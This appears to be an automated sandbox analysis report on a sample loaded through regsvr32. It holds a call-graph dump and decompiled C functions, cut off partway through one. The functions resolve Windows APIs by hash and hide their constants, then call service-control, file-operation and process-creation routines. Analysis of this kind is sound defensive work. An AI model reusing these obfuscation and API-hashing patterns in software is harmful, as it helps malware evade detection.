GetPEB 4889->4897 4900 574bb4 2 API calls 4889->4900 4903 58734a GetPEB 4889->4903 4906 57b9d7 GetPEB 4889->4906 4907 579b80 3 API calls 4889->4907 4890->4889 4891->4121 4891->4891 4893 5866c2 2 API calls 4892->4893 4895 58715b 4893->4895 4894->4889 4896 574bb4 2 API calls 4895->4896 4898 58717e 4896->4898 4897->4889 4899 58734a GetPEB 4898->4899 4901 5871be 4899->4901 4900->4889 4902 57b9d7 GetPEB 4901->4902 4904 5871d6 4902->4904 4903->4889 4905 5863f0 3 API calls 4904->4905 4905->4891 4906->4889 4907->4889 4909 580f8d 4908->4909 4912 591bd6 4909->4912 4913 591bf5 4912->4913 4914 58bff0 GetPEB 4913->4914 4915 581069 4914->4915 4915->4815 4917 58641e 4916->4917 4918 57b184 GetPEB 4917->4918 4919 58663b 4918->4919 4920 5846e0 2 API calls 4919->4920 4921 586676 4920->4921 4922 58e373 2 API calls 4921->4922 4925 586683 4921->4925 4923 5866a3 4922->4923 4924 58e373 2 API calls 4923->4924 4924->4925 4925->4825 4927 57b219 4926->4927 4928 57f2b9 GetPEB 4927->4928 4929 57b2e7 4928->4929 4929->4829 4931 579b9f 4930->4931 4933 579e5e 4931->4933 4934 58bf1c 2 API calls 4931->4934 4936 579e5c 4931->4936 4937 58454e 4931->4937 4935 58e373 2 API calls 4933->4935 4934->4931 4935->4936 4936->4829 4938 584575 4937->4938 4939 58bff0 GetPEB 4938->4939 4940 584615 4939->4940 4940->4931 4942 58bff0 GetPEB 4941->4942 4943 58e0c1 4942->4943 4943->4836 4947 57f7a0 4944->4947 4945 57f985 4948 574627 GetPEB 4945->4948 4946 57f983 4946->4836 4947->4945 4947->4946 4949 58eaa3 2 API calls 4947->4949 4948->4946 4949->4947 4951 57d7d6 4950->4951 4952 58bff0 GetPEB 4951->4952 4953 57d87c 4952->4953 4953->4836 4955 590e92 4954->4955 4957 57fbf8 GetPEB 4955->4957 4958 591061 4955->4958 4959 591076 4955->4959 4976 58d0a1 4955->4976 4980 572f1a 4955->4980 4957->4955 4961 58e373 2 API calls 4958->4961 4959->4869 4961->4959 4963 58bff0 GetPEB 4962->4963 4964 57fcac 4963->4964 4964->4869 4967 57db99 4965->4967 4968 57b184 GetPEB 4967->4968 4969 57df48 4967->4969 4971 57e07b 4967->4971 4972 574bb4 2 API calls 4967->4972 4975 57b9d7 GetPEB 4967->4975 4988 585a47 4967->4988 4992 58e8e7 4967->4992 4968->4967 4984 591d6d 4969->4984 4971->4971 4972->4967 4975->4967 4977 58d0bd 4976->4977 4978 58bff0 GetPEB 4977->4978 4979 58d13e 4978->4979 4979->4955 4981 572f3e 4980->4981 4982 58bff0 GetPEB 4981->4982 4983 572fcc 4982->4983 4983->4955 4985 591d80 4984->4985 4986 58bff0 GetPEB 4985->4986 4987 57df59 4986->4987 4987->4869 4989 585a82 4988->4989 4990 58bff0 GetPEB 4989->4990 4991 585b29 4990->4991 4991->4967 4993 58e902 4992->4993 4994 58bff0 GetPEB 4993->4994 4995 58e994 4994->4995 4995->4967 4997 573c6f 4996->4997 5002 573eff 4997->5002 5009 583ff6 4997->5009 5000 581d1c GetPEB 5001 573eb6 5000->5001 5001->5002 5003 581d1c GetPEB 5001->5003 5002->4878 5003->5001 5007 580e27 5004->5007 5005 58e9a4 GetPEB 5005->5007 5006 580f48 5006->4878 5007->5005 5007->5006 5013 573455 5007->5013 5010 584017 5009->5010 5011 58bff0 GetPEB 5010->5011 5012 573e94 5011->5012 5012->5000 5012->5002 5014 573468 5013->5014 5015 58bff0 GetPEB 5014->5015 5016 573502 5015->5016 5016->5007 5018 58da29 5017->5018 5019 58bff0 GetPEB 5018->5019 5020 573149 5019->5020 5020->3944 5022 585cca 5021->5022 5023 58bff0 GetPEB 5022->5023 5024 585d5a 5023->5024 5024->4136 5026 5800ae 5025->5026 5027 58eaa3 2 API calls 5026->5027 5028 587394 GetPEB 5026->5028 5029 58040e 5026->5029 5027->5026 5028->5026 5029->4136 5031 57f61e 5030->5031 5032 58bff0 GetPEB 5031->5032 5033 57f6be 5032->5033 5033->4136 5035 58bff0 GetPEB 5034->5035 5036 57e370 5035->5036 5036->4136 5038 57f9bd 5037->5038 5039 58bff0 GetPEB 5038->5039 5040 57fa61 5039->5040 5040->4143 5042 585c1b 5041->5042 5043 58bff0 GetPEB 5042->5043 5044 585ca5 5043->5044 5044->4148 5046 57e0fe 5045->5046 5047 58bff0 GetPEB 5046->5047 5048 57e19d 5047->5048 5048->4148 5053 57d8af 5049->5053 5051 57da67 5073 57ff02 5051->5073 5053->5051 5054 57da65 5053->5054 5055 57b184 GetPEB 5053->5055 5069 581c3c 5053->5069 5054->4165 5055->5053 5060 579425 5056->5060 5057 574bb4 2 API calls 5057->5060 5058 573f09 GetPEB 5058->5060 5059 57954c 5061 573152 GetPEB 5059->5061 5060->5057 5060->5058 5060->5059 5062 57b9d7 GetPEB 5060->5062 5063 57954a 5060->5063 5077 58462a 5060->5077 5061->5063 5062->5060 5063->4165 5066 57f6e5 5065->5066 5067 58bff0 GetPEB 5066->5067 5068 57f778 5067->5068 5068->4171 5070 581c5e 5069->5070 5071 58bff0 GetPEB 5070->5071 5072 581d0f 5071->5072 5072->5053 5074 57ff24 5073->5074 5075 58bff0 GetPEB 5074->5075 5076 57ffca 5075->5076 5076->5054 5078 584649 5077->5078 5079 58bff0 GetPEB 5078->5079 5080 5846d3 5079->5080 5080->5060

                                                                                                                Executed Functions

                                                                                                                Function 0057F1D5 Relevance: 1.6, APIs: 1, Instructions: 69COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0057F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00579E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E0058BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

















                                                                                                                0x0057f1e5
                                                                                                                0x0057f1ea
                                                                                                                0x0057f1f5
                                                                                                                0x0057f1fa
                                                                                                                0x0057f203
                                                                                                                0x0057f20a
                                                                                                                0x0057f20d
                                                                                                                0x0057f210
                                                                                                                0x0057f217
                                                                                                                0x0057f21b
                                                                                                                0x0057f21f
                                                                                                                0x0057f226
                                                                                                                0x0057f22d
                                                                                                                0x0057f23a
                                                                                                                0x0057f23e
                                                                                                                0x0057f241
                                                                                                                0x0057f245
                                                                                                                0x0057f24c
                                                                                                                0x0057f253
                                                                                                                0x0057f25a
                                                                                                                0x0057f25e
                                                                                                                0x0057f265
                                                                                                                0x0057f276
                                                                                                                0x0057f279
                                                                                                                0x0057f27d
                                                                                                                0x0057f284
                                                                                                                0x0057f2a3
                                                                                                                0x0057f2b0
                                                                                                                0x0057f2b8

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0057F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: b80d3684ce81b213d678b5836033bd956448db1d1fdf8f47dc2ac386acd6874c
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 722148B5D0121DAFDB04DF95C88A8EEBFB4FB44708F10809DE515AA250C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 005732B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 5732b5-57338a call 579e7d call 58bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E005732B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E00579E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E0058BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}














                                                                                                                0x005732be
                                                                                                                0x005732bf
                                                                                                                0x005732c2
                                                                                                                0x005732c3
                                                                                                                0x005732c8
                                                                                                                0x005732cd
                                                                                                                0x005732d6
                                                                                                                0x005732d9
                                                                                                                0x005732dc
                                                                                                                0x005732e9
                                                                                                                0x005732ec
                                                                                                                0x005732f4
                                                                                                                0x005732f5
                                                                                                                0x005732fa
                                                                                                                0x00573304
                                                                                                                0x0057330b
                                                                                                                0x0057330f
                                                                                                                0x00573316
                                                                                                                0x0057331d
                                                                                                                0x00573324
                                                                                                                0x00573335
                                                                                                                0x00573338
                                                                                                                0x0057333c
                                                                                                                0x00573343
                                                                                                                0x0057334a
                                                                                                                0x00573361
                                                                                                                0x00573364
                                                                                                                0x00573377
                                                                                                                0x00573384
                                                                                                                0x0057338a

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00573384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: efa3c49c50233b625944e6d736e117a47f5916646f2f77faa6e9945dbf2cfd64
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: A02112B5D01229FBDB04DFA9D84A9EEBFB9FB40304F208189E424A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0057C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 57c4eb-57c5c2 call 579e7d call 58bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0057C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00579E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E0058BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}














                                                                                                                0x0057c4f2
                                                                                                                0x0057c4f5
                                                                                                                0x0057c4f7
                                                                                                                0x0057c4fa
                                                                                                                0x0057c4fd
                                                                                                                0x0057c500
                                                                                                                0x0057c501
                                                                                                                0x0057c502
                                                                                                                0x0057c507
                                                                                                                0x0057c50e
                                                                                                                0x0057c515
                                                                                                                0x0057c51c
                                                                                                                0x0057c523
                                                                                                                0x0057c52a
                                                                                                                0x0057c52d
                                                                                                                0x0057c531
                                                                                                                0x0057c538
                                                                                                                0x0057c53f
                                                                                                                0x0057c556
                                                                                                                0x0057c55e
                                                                                                                0x0057c562
                                                                                                                0x0057c569
                                                                                                                0x0057c570
                                                                                                                0x0057c577
                                                                                                                0x0057c57e
                                                                                                                0x0057c585
                                                                                                                0x0057c58c
                                                                                                                0x0057c593
                                                                                                                0x0057c59a
                                                                                                                0x0057c5ad
                                                                                                                0x0057c5bc
                                                                                                                0x0057c5c2

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0057C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: 8950cf8539bfb95dce4c8ce1f55fe49f52ee6b904ebb6818c38a09e58e61bfb9
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 69211FB5C00209ABCF15DFA4D8499EEBBB4FF04318F108588E92566260E3B15B14DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 58a98e-58aa51 call 579e7d call 58bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0058A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E00579E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E0058BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}













                                                                                                                0x0058a994
                                                                                                                0x0058a997
                                                                                                                0x0058a99c
                                                                                                                0x0058a9a1
                                                                                                                0x0058a9a7
                                                                                                                0x0058a9ae
                                                                                                                0x0058a9b5
                                                                                                                0x0058a9c2
                                                                                                                0x0058a9c5
                                                                                                                0x0058a9c8
                                                                                                                0x0058a9cf
                                                                                                                0x0058a9db
                                                                                                                0x0058a9dc
                                                                                                                0x0058a9e1
                                                                                                                0x0058a9eb
                                                                                                                0x0058a9f2
                                                                                                                0x0058a9f9
                                                                                                                0x0058aa00
                                                                                                                0x0058aa17
                                                                                                                0x0058aa1a
                                                                                                                0x0058aa2b
                                                                                                                0x0058aa2e
                                                                                                                0x0058aa41
                                                                                                                0x0058aa4c
                                                                                                                0x0058aa51

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0058AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: ddf27130f00d6a1603dcee4f4a5dbd5f6b31c1d9f103826ac8ff7f1b2a013b45
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: D12106B5D05209EBEF04DFA4D98A9AEBBB5BB40304F10C199E804AB260D7B49B449F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0057338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 513 57338b-573454 call 579e7d call 58bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0057338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E00579E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E0058BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}













                                                                                                                0x00573391
                                                                                                                0x00573396
                                                                                                                0x0057339b
                                                                                                                0x005733a1
                                                                                                                0x005733a5
                                                                                                                0x005733ac
                                                                                                                0x005733b9
                                                                                                                0x005733bd
                                                                                                                0x005733c0
                                                                                                                0x005733c7
                                                                                                                0x005733d8
                                                                                                                0x005733db
                                                                                                                0x005733f2
                                                                                                                0x005733f5
                                                                                                                0x005733fc
                                                                                                                0x00573403
                                                                                                                0x0057340a
                                                                                                                0x0057340e
                                                                                                                0x00573415
                                                                                                                0x0057341c
                                                                                                                0x00573427
                                                                                                                0x0057342a
                                                                                                                0x00573431
                                                                                                                0x00573444
                                                                                                                0x0057344f
                                                                                                                0x00573454

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0057344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: 16b531a0d4962ec0cf4211fd867b60d5a68b35c3fb812dd698a8be5a9dca2ae6
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: BA2124B4D00209EFDF04DFA5C94AAAEBFB4FB40304F108189E424AA250D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0058E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E00579E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E0058BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}











                                                                                                                0x0058e37a
                                                                                                                0x0058e37d
                                                                                                                0x0058e37f
                                                                                                                0x0058e382
                                                                                                                0x0058e384
                                                                                                                0x0058e389
                                                                                                                0x0058e392
                                                                                                                0x0058e399
                                                                                                                0x0058e3a0
                                                                                                                0x0058e3a7
                                                                                                                0x0058e3ae
                                                                                                                0x0058e3b5
                                                                                                                0x0058e3bc
                                                                                                                0x0058e3c3
                                                                                                                0x0058e3cf
                                                                                                                0x0058e3d5
                                                                                                                0x0058e3d8
                                                                                                                0x0058e3df
                                                                                                                0x0058e3e6
                                                                                                                0x0058e3ed
                                                                                                                0x0058e3f4
                                                                                                                0x0058e40b
                                                                                                                0x0058e413
                                                                                                                0x0058e426
                                                                                                                0x0058e42f
                                                                                                                0x0058e435

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00583F2A,00000000), ref: 0058E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: 758038b5841a069c9b91c1f868b177de0c5f827a57154503018aa4abef853ea7
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: 1D1159B5D00209EFDF58DFA4C84989EBBB4EB40324F108299E824B62A0D7B55B059F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 005846E0 Relevance: 1.6, APIs: 1, Instructions: 76processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E005846E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00579E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
